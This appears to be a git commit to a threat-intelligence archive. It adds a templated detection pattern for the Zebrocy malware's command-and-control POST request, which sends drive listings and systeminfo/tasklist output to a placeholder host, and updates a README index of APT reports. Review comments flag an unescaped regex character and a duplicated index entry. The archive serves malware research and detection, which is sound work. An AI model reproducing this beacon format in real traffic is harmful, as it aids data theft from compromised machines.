2018.04.24.sednit-update-analysis-zebrocy

CyberMonitor 2018-04-25 15:38:13 +08:00
parent 00614bb5b1
commit d94c6fcbae
3 changed files with 21 additions and 1 deletions

@ -0,0 +1,19 @@
POST (\/[a-zA-Z0-9\-\_\^\.]*){3}\.(php|dat)?fort=<SerialNumber_C> HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: xxxx
Host: <ip_address>
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1
pol=MM/DD/YYYY%20HH:MM:SS%20(AM|PM)%0D%0A<DriveListing>%0D%0A%0D%0A<Path_to_the_binary>%0D%0A%0D%0A<SYSTEMINFO & TASKLIST output>
[...]
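Review bot: In the request line of the new file, the `?` in `\.(php|dat)?fort=` is unescaped, so read as a regular expression it makes the extension group optional instead of matching the literal query separator. If the pattern is meant to be matched against proxy or web logs, write it as `\.(php|dat)\?fort=`. The header lines also run straight into the `pol=` body with no blank line between them, and `Content-Length: xxxx` and the trailing `[...]` are placeholders, so a short note in the file saying that this is a template and not a verbatim capture would avoid misreading.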

@ -16,7 +16,8 @@ Please fire issue to me if any lost APT/Malware events/campaigns.
## 2018
* Apr 23 - [[Kaspersky] Energetic Bear/Crouching Yeti: attacks on servers](https://securelist.com/energetic-bear-crouching-yeti/85345/) | [Local](../../blob/master/2018/2018.04.12.operation-parliament)
* Apr 24 - [[ESET] Sednit update: Analysis of Zebrocy](https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/) | [Local](../../blob/master/2018/2018.04.24.sednit-update-analysis-zebrocy)
* Apr 23 - [[Kaspersky] Energetic Bear/Crouching Yeti: attacks on servers](https://securelist.com/energetic-bear-crouching-yeti/85345/) | [Local](../../blob/master/2018/2018.04.23.energetic-bear-crouching-yeti)
* Apr 12 - [[Kaspersky] Operation Parliament, who is doing what?](https://securelist.com/operation-parliament-who-is-doing-what/85237/) | [Local](../../blob/master/2018/2018.04.12.operation-parliament)
* Apr 04 - [[Trend Micro] New MacOS Backdoor Linked to OceanLotus Found](https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/) | [Local](../../blob/master/2018/2018.04.04.MacOS_Backdoor_OceanLotus)
* Mar 29 - [[Trend Micro] ChessMaster Adds Updated Tools to Its Arsenal](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/) | [Local](../../blob/master/2018/2018.03.29.ChessMaster_Adds_Updated_Tools)
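Review bot: The Apr 23 Energetic Bear/Crouching Yeti entry appears twice in this hunk, and the first copy's Local link points to `2018/2018.04.12.operation-parliament`, which is the directory of the Apr 12 entry. Please confirm that copy is the line being removed, so that only the entry linking to `2018/2018.04.23.energetic-bear-crouching-yeti` remains, directly below the new Apr 24 ESET entry, which keeps the list in newest-first order.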